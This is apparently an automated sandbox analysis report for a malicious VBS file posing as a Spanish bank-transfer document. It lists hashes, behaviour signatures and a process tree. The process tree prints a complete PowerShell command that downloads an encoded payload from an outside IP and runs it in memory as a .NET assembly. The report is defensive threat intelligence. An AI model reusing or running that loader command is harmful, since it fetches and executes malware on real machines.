Overview

overview

10

Static

static

Transferen...os.vbs

windows7-x64

10

Transferen...os.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    41s
  • max time network
    44s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    13-09-2022 04:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Transferencia_Datos bancarios.vbs

  • Size

    433KB

  • MD5

    e5c789225ef05bb4cf08ba2256550e7a

  • SHA1

    e539d74166c70a2111409b82a5d735007e1ceed3

  • SHA256

    5d4c7f07cb9896d740a7c174f63426f112952c95f12c6ab3a95f2e097e962518

  • SHA512

    56bf329a93529f760f9fe4cf821397580288865eb61fa914f26276f01463ea90d9db8775004c9cce30d3acdc5628b5eea0dedcb7c6ea2195d29deae32f5d72cd

  • SSDEEP

    48:yGoGjDfRzToTcjZR+EVrIoUgOiAwH0AuBQ/toTqKr:loGPfV//+uIoUgy5xBr

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://20.7.14.99/bug/dll_nostartup.mp4

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Transferencia_Datos bancarios.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1408
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/bug/dll_nostartup.mp4'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.fvdsjafndsbfvxsfbndsdvbnnv/42.021.871.591//:ptth'))
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1944

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1408-54-0x000007FEFB8B1000-0x000007FEFB8B3000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1944-57-0x000007FEF3560000-0x000007FEF3F83000-memory.dmp

    Filesize

    10.1MB

    Download

  • memory/1944-59-0x0000000002534000-0x0000000002537000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1944-58-0x000007FEF2A00000-0x000007FEF355D000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/1944-60-0x000000000253B000-0x000000000255A000-memory.dmp

    Filesize

    124KB

    Download

  • memory/1944-61-0x0000000002534000-0x0000000002537000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1944-62-0x000000000253B000-0x000000000255A000-memory.dmp

    Filesize

    124KB

    Download